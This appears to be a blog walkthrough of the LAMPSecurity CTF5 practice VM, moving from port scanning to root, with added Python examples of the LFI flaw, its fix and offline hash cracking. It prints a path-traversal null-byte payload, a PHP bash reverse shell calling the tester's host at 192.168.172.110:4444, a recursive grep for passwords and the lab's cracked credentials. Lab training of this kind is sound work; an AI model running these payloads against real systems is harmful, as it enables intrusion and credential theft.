• VM: LAMPSecurity: CTF5
  • Goal: Gain root access
  • Approach: solve without automated exploitation tools

Target Discovery

nmap -sn 192.168.172.200-254
[screenshot: ctf5 target discovery]

Port Scanning

nmap -p- -A 192.168.172.240
  • Port 22: OpenSSH 4.7
  • Port 25: SMTP
  • Port 80: Apache httpd 2.2.6
  • Port 110: pop3 ipop3d 2006k.101
  • Port 111: RPC #100000
  • Port 139: Samba smbd 3.X – 4.X (workgroup: MYGROUP)
  • Port 143: University of Washington IMAP imapd 2006k.396
  • Port 445: Samba 3.0.26a-6.fc8
  • Port 901: Samba SWAT administration server
  • Port 3306: MySQL 5.0.45

Enumeration

There are quite a few ports open. First, let's check out the website.

[screenshot: homepage]

I tested the site for SQL injection but didn't find any.

I then identified a local file inclusion (LFI) vulnerability in the page parameter:

http://192.168.172.240?page=../../../../etc/passwd%00

The ../ sequences walk up out of the web root, and the trailing %00 is a URL-encoded null byte: if the script appends a fixed extension to the parameter, PHP versions before 5.3.4 stop reading the filename at the null, so whatever follows is discarded and /etc/passwd is opened as-is.

[screenshot: LFI, /etc/passwd returned]
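To make the include pattern and its fix concrete, here is an added example (not code from the original post or from NanoCMS). The target is a PHP application, so this is a Python model of it: vulnerable_resolve() reproduces the `include($pages_dir . $_GET['page'] . '.php')` pattern together with the null-byte truncation PHP before 5.3.4 applied to filenames, and safe_resolve() shows a hardened resolver. The pages directory, the `.php` suffix and the page names are assumptions made for the demo.

```python
"""Model of the ?page= local file inclusion and its fix.

Added example, not code from the original post or from NanoCMS. The pages
directory, the appended suffix and the page names are assumptions.
"""
import os
from typing import Iterable, Optional

PAGE_SUFFIX = ".php"  # extension the vulnerable app appends (assumed)


def vulnerable_resolve(pages_dir: str, page: str) -> str:
    """Build the include path the way the vulnerable app does.

    The user-controlled value is concatenated unchanged, so ../ walks out of
    pages_dir. Old PHP handed the string to a C-level open(), which stops at
    the first NUL byte; that truncation is emulated with split() because
    Python itself refuses to open a path containing NUL.
    """
    raw = pages_dir + "/" + page + PAGE_SUFFIX
    return os.path.normpath(raw.split("\x00", 1)[0])


def safe_resolve(pages_dir: str, page: str,
                 allowed: Optional[Iterable[str]] = None) -> Optional[str]:
    """Return the file to include, or None if the request must be refused.

    Two independent checks: an optional allowlist of page names, and a
    canonical-path containment check that catches ../, absolute paths and
    symlink tricks even when no allowlist is configured.
    """
    if "\x00" in page:
        return None
    if allowed is not None and page not in set(allowed):
        return None
    base = os.path.realpath(pages_dir)
    candidate = os.path.realpath(os.path.join(base, page + PAGE_SUFFIX))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def demo(pages_dir: str = "/var/www/html/pages") -> dict:
    """Run both resolvers on a normal request and on the post's payload."""
    payload = "../../../../etc/passwd\x00"  # what ?page=...%00 decodes to
    allowlist = ["about", "blog"]
    return {
        "vuln_normal": vulnerable_resolve(pages_dir, "about"),
        "vuln_payload": vulnerable_resolve(pages_dir, payload),
        "safe_normal": safe_resolve(pages_dir, "about", allowed=allowlist),
        "safe_payload": safe_resolve(pages_dir, payload, allowed=allowlist),
        "safe_traversal_no_allowlist": safe_resolve(
            pages_dir, "../../../../etc/passwd"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:28} -> {result}")
```

The vulnerable resolver turns the payload into /etc/passwd with the suffix gone; the safe one refuses it on the null byte, on the allowlist, and (with no allowlist at all) on the containment check, which is the one worth keeping even after upgrading PHP.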

Further checking the website shows that it uses NanoCMS for blogging (Blog tab).

[screenshot: NanoCMS]

A quick search for NanoCMS vulnerabilities shows that /data/pagesdata.txt exposes the admin password hash. Requesting it on the target returns the file with the hash:

http://192.168.172.240/~andy/data/pagesdata.txt

[screenshot: NanoCMS password hash]

username: admin, password hash: 9d2f75377ac0ab991d40c91fd27e52fd

The hash is 32 hex characters, so it is most likely an unsalted MD5. I used the website md5decrypt.net and found the password quickly: shannon. (On a real engagement, prefer cracking offline against a wordlist: submitting a client's hashes to a third-party lookup site hands them to that site.)

username: admin,    password: shannon
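The same identification-and-crack step done locally, as an added example that is not code from the original post or from NanoCMS: guess the digest algorithm from the hex length, then try each candidate word. The hash is the admin hash from pagesdata.txt above; the wordlist is constructed for the demo (a real run would stream a file such as rockyou.txt through crack_file()).

```python
"""Identify a bare hash and crack it offline against a wordlist.

Added example, not code from the original post or from NanoCMS. WORDLIST is
constructed for the demo; NANOCMS_HASH is the admin hash from the post.
"""
import hashlib
from typing import Iterable, Optional

# Hex-digest length -> hashlib algorithm. Length only narrows the field (32
# hex could also be NTLM or MD4, 40 hex could be RIPEMD-160), so treat the
# guess as the first thing to try, not a certainty.
LENGTH_TO_ALGO = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}

NANOCMS_HASH = "9d2f75377ac0ab991d40c91fd27e52fd"  # admin hash from the post

# Constructed wordlist: a few decoys around the post's answer.
WORDLIST = ["password", "admin", "andy", "letmein", "shannon", "123456"]


def guess_algorithm(digest: str) -> Optional[str]:
    """Return the hashlib name suggested by the digest's length, or None."""
    digest = digest.strip().lower()
    if not digest or any(c not in "0123456789abcdef" for c in digest):
        return None
    return LENGTH_TO_ALGO.get(len(digest))


def hexdigest(word: str, algorithm: str = "md5") -> str:
    """Hex digest of one candidate word (shared by crack() and the tests)."""
    data = word.encode("utf-8", "surrogateescape")
    return hashlib.new(algorithm, data).hexdigest()


def crack(digest: str, words: Iterable[str],
          algorithm: Optional[str] = None) -> Optional[str]:
    """Return the first word whose digest matches, or None.

    The target is compared case-insensitively because dump formats vary;
    each candidate has its line terminator stripped so file input works.
    """
    algorithm = algorithm or guess_algorithm(digest)
    if algorithm is None:
        raise ValueError(f"cannot identify hash type of {digest!r}")
    target = digest.strip().lower()
    for word in words:
        word = word.rstrip("\r\n")
        if hexdigest(word, algorithm) == target:
            return word
    return None


def crack_file(digest: str, wordlist_path: str) -> Optional[str]:
    """Stream a wordlist from disk so large files never sit in memory."""
    with open(wordlist_path, encoding="utf-8", errors="surrogateescape") as fh:
        return crack(digest, fh)


if __name__ == "__main__":
    print(f"{NANOCMS_HASH}: looks like {guess_algorithm(NANOCMS_HASH)}")
    print("cracked:", crack(NANOCMS_HASH, WORDLIST))
```

If the length-based guess is wrong, pass `algorithm=` explicitly; a miss across the whole wordlist with the right algorithm usually means the hash is salted or the word simply is not in the list, not that the code is broken.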

Exploitation

All right, a good start. Let's try those credentials at the Admin Login on Andy's Blog page. Sure enough, the login succeeds and we land in the NanoCMS Admin Panel.

[screenshot: NanoCMS Admin Panel]

Looking around the Admin Panel, I quickly spot something very interesting: ‘New Page’. It lets me create new blog pages, so I create one containing a short PHP snippet to test whether PHP code in page content gets executed.

[screenshot: test php]

I add the page and then open the new blog page ‘Testing’ under Pages & Options.

Awesome. PHP code execution is possible: page content is evaluated as PHP rather than served as text.

Limited Shell

We can use this PHP code execution to get a reverse shell. First start Netcat on the Kali box listening on port 4444:

nc -lp 4444

Then change the Testing blog page's content to the following (the Kali box's IP address is 192.168.172.110):

<?php
system("bash -i >& /dev/tcp/192.168.172.110/4444 0>&1");
?>

Now refresh the Testing blog page and watch the Kali listener:

[screenshot: limited shell]

We have shell access as the apache user. Note that PHP's system() runs the command through /bin/sh -c, so the >& and /dev/tcp redirections, which are bash features, only work because /bin/sh is bash on this Fedora box; on a system where sh is dash, wrap the command as bash -c '...'.

Privilege Escalation

With shell access, we look around the system for anything useful for gaining root: sudo rules, setuid binaries, configuration files and users' files.

Luckily, we come across the root password while recursively grepping /home for the word 'password':

grep -R -i password /home/* 2> /dev/null

[screenshot: possible root password]

It looks like a Tomboy note in patrick's home directory holds the root password.

cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note

[screenshot: found root password]

Root password: 50$cent

Let's try it out:

[screenshot: root access]

Bingo! Root access. (If su refuses with "must be run from a terminal", the reverse shell has no pty: spawn one first with python -c 'import pty; pty.spawn("/bin/bash")', or use the password over SSH on port 22 if root login is permitted there.)

Thanks to the author, madirish2600, for the box LAMPSecurity: CTF5.

This Post Has 2 Comments

  1. grep -R -i password /home/* 2> /dev/null
    Can you please explain this command?

    1. It searches recursively for files in the folder /home that contain the text ‘password’.
      -R: recursively
      -i: case insensitive
      2> /dev/null: do not display errors (e.g. permission denied)
